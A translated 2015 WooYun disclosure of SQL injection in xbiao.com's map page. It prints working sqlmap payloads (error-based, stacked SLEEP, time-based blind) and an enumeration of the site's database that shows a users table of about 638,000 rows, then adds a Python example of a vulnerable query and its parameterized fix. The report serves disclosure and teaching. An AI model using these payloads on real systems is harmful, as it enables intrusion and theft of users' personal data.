Vulnerability summary

Defect ID: wooyun-2015-0123562

Title: Xbiao (腕表之家) SQL injection leaks 630k users' data

Affected vendor: xbiao.com

Author: 路人甲

Submitted: 2015-07-05 16:48

Fixed: 2015-08-19 19:16

Published: 2015-08-19 19:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-05: details sent to the vendor, awaiting the vendor's handling
2015-07-05: vendor confirmed; details visible to the vendor only
2015-07-15: details disclosed to core white hats and relevant domain experts
2015-07-25: details disclosed to regular white hats
2015-08-04: details disclosed to intern white hats
2015-08-19: details disclosed to the public

Brief description:

Xbiao (腕表之家) SQL injection leaks 630k users' data (second report)

Details:

http://s.xbiao.com/map?id=270

Proof of vulnerability:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=270') AND (SELECT 9984 FROM(SELECT COUNT(*),CONCAT(0x7174687771,(SELECT (CASE WHEN (9984=9984) THEN 1 ELSE 0 END)),0x716e736d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BdZQ'='BdZQ
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=270'); SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=270') AND SLEEP(5) AND ('NLgH'='NLgH
---
web application technology: Apache, PHP 5.3.27
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] watch
Database: watch
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| watch_bdsearch_rank | 3065885 |
| watch_consumer_count | 2200741 |
| apache_log | 1392751 |
| watch_count_month | 1018802 |
| watch_link_flag | 987799 |
| watch_product_param_function | 981470 |
| watch_link_catch | 930492 |
| watch_visit_ip_log | 789364 |
| watch_users | 638259 |
| watch_product_param_appearance | 576341 |
| watch_product_param_clock | 498352 |
| watch_count | 477396 |
| watch_search_keywords_log | 442206 |
| watch_apple_user | 293294 |
| watch_iphone_count_month | 252435 |
| watch_app_devices | 226571 |
| watch_user_online | 196244 |
| watch_product_param_normal | 141603 |
| watch_data_catch | 127616 |
| watch_wbiao_compare | 124239 |
| tmp_pic_local | 119017 |
| tmp_pic | 117645 |
| watch_image_info | 104032 |
| wcms_content_log | 100154 |
| watch_ald_content | 89656 |
| watch_product_price | 70768 |
| watch_product | 38421 |
| watch_product_info | 38230 |
| watch_search_keywords | 37678 |
| watch_news_relation | 34444 |
| watch_catch | 33399 |
| tao_products_copy | 30312 |
| cms_base | 30089 |
| cms_content | 30086 |
| watch_brand_rank | 27340 |
| wcms_content_count | 25160 |
| cms_content_bak | 25030 |
| watch_blackwords | 24427 |
| watch_user_cookies | 24102 |
| watch_kms | 23441 |
| watch_brand_catch | 21522 |
| cms_image | 20709 |
| watch_product_comment | 19779 |
| watch_movement_param_val | 19044 |
| watch_link_log | 16906 |
| watch_aladdin | 15698 |
| watch_correction_data | 13031 |
| tao_union_goods | 12862 |
| watch_iwatch365_thread | 11918 |
| watch_favorite_article | 11905 |
| watch_store_brand | 11224 |
| watch_consumer_process | 10980 |
| watch_favorite_brand | 10729 |
| watch_correction | 10280 |
| watch_consumer | 9034 |
| watch_consumer_intention | 9034 |
| watch_sms_captcha | 8965 |
| watch_store | 7140 |
| watch_sms_log | 6244 |
| watch_signature | 5911 |
| watch_link | 5381 |
| watch_job | 5322 |
| wf_img | 4243 |
| watch_vote | 4005 |
| watch_index_pos | 3976 |
| tmp_file | 3822 |
| wf_img_temp | 3678 |
| wcms_content_position | 3546 |
| wf_img_tag | 3521 |
| watch_little_series | 3141 |
| zuoye_relation | 3079 |
| add_log | 2944 |
| wcms_zuoye | 2738 |
| watch_data_dict | 2096 |
| watch_cms_pinjian | 2044 |
| tao_comments | 1942 |
| tao_products | 1838 |
| watch_cat_book_detail | 1825 |
| watch_advise | 1817 |
| watch_cat_new_product | 1369 |
| watch_bbs_recommend | 1367 |
| watch_movement | 1319 |
| watch_series | 1254 |
| watch_authenuser | 964 |
| watch_syslog | 921 |
| watch_index_recommend | 754 |
| watch_bbs_recommend_delete | 600 |
| watch_manual_position | 465 |
| watch_shoot_product | 431 |
| watch_author_id | 425 |
| watch_hot_keywords | 396 |
| watch_catch_log | 376 |
| watch_wbiao_brand | 337 |
| watch_city | 334 |
| watch_brand_store | 304 |
| watch_loves_product | 289 |
| watch_baike | 269 |
| watch_store_picture | 259 |
| wcms_cat_relation | 238 |
| watch_brand_compare | 226 |
| watch_piaget2014 | 224 |
| watch_cat_image_book | 218 |
| tao_union_brand | 217 |
| watch_admin_log | 217 |
| watch_power | 211 |
| zhuanti_common | 199 |
| watch_basel_vote | 182 |
| harmony_shopes | 174 |
| watch_movement_img | 174 |
| watch_loves_product_price | 169 |
| watch_param_value | 157 |
| watch_hot_keywords_log | 113 |
| watch_stop_product | 113 |
| wf_tag | 107 |
| watch_brand | 93 |
| watch_zhuanti_comments | 93 |
| watch_admin_user | 88 |
| watch_store_correction | 86 |
| watch_hk_log | 80 |
| watch_hg_log | 75 |
| watch_param | 73 |
| watch_param_search | 73 |
| watch_brand_forum_relation | 72 |
| watch_zhuanti | 66 |
| watch_hk_consumer_intention | 64 |
| watch_medal_relation | 60 |
| watch_movement_correction | 56 |
| wcms_author | 55 |
| watch_file_cache | 52 |
| watch_movement_manufacturer | 49 |
| watch_iwatch365_forum | 48 |
| watch_events | 42 |
| watch_hg_goods | 41 |
| watch_hk_consumer | 41 |
| watch_temp_shoot | 37 |
| watch_holidays | 35 |
| watch_province | 34 |
| watch_geneva_vote | 27 |
| watch_template | 27 |
| watch_brand_seo_log | 25 |
| watch_hg_info | 22 |
| wcms_copyfrom | 22 |
| watch_hk_discount | 17 |
| watch_kms_param | 14 |
| watch_country | 12 |
| watch_software | 12 |
| tao_favor | 11 |
| tao_users | 10 |
| watch_consumer_note | 10 |
| watch_admin_message | 7 |
| watch_medal_grade | 7 |
| watch_admin_group | 6 |
| watch_param_type | 6 |
| wcms_position | 5 |
| watch_company | 4 |
| wcms_category | 4 |
| watch_mobile_version | 3 |
| wcms_params | 3 |
| tao_union_log | 1 |
| watch_groups | 1 |
| watch_interview | 1 |
| watch_search_keywords_suggestion | 1 |

Fix:

Filter the parameter.
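As an added illustration (not code from the report or from xbiao.com), the injection context the payloads above imply, beside the parameterized form that removes it; it uses sqlite3 in place of the site's MySQL, and the `('...')` quoting around `id`, the table name `map` and its rows are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the site's map lookup (sqlite3 instead of MySQL).
# The ('...') quoting around id is an assumption inferred from the payload
# shape "270') AND ... AND ('x'='x" in the sqlmap output above.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE map (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO map VALUES (?, ?)",
                     [(270, "store-270"), (271, "store-271"), (999, "internal")])
    return conn

def id_from_url(url):
    """Pulls the id query parameter out of a request URL, e.g. /map?id=270."""
    return parse_qs(urlsplit(url).query).get("id", [""])[0]

def lookup_vulnerable(conn, raw_id):
    """The injectable pattern: the raw parameter is spliced into the SQL text,
    so a value containing a quote can close the literal and append clauses."""
    sql = "SELECT id, name FROM map WHERE (id='%s')" % raw_id
    return conn.execute(sql).fetchall()

def lookup_fixed(conn, raw_id):
    """The fix: validate the type, then bind the value as a query parameter.
    Bound values are never parsed as SQL, whatever characters they contain."""
    if not raw_id.isdigit():
        return []                      # reject anything that is not a plain integer
    return conn.execute("SELECT id, name FROM map WHERE (id=?)",
                        (int(raw_id),)).fetchall()

# Constructed boolean payload in the same quote-breaking shape as the page's
# payloads (the SLEEP()/FLOOR(RAND()) ones above are MySQL-specific).
PAYLOAD = "270') OR ('1'='1"

if __name__ == "__main__":
    db = make_db()
    good = id_from_url("http://s.xbiao.com/map?id=270")
    print("vulnerable, normal id:", lookup_vulnerable(db, good))     # one row
    print("vulnerable, payload:  ", lookup_vulnerable(db, PAYLOAD))  # every row
    print("fixed, normal id:     ", lookup_fixed(db, good))          # one row
    print("fixed, payload:       ", lookup_fixed(db, PAYLOAD))       # nothing
```

The vulnerable function returns every row for the payload because the quote closes the literal and the appended `OR` is evaluated as SQL; the fixed function rejects it before the query is ever built.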

Copyright notice: when republishing, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-07-05 19:14

Vendor reply:

Thank you for the vulnerability information; it has already been fixed. Many thanks.

Latest status:

None yet

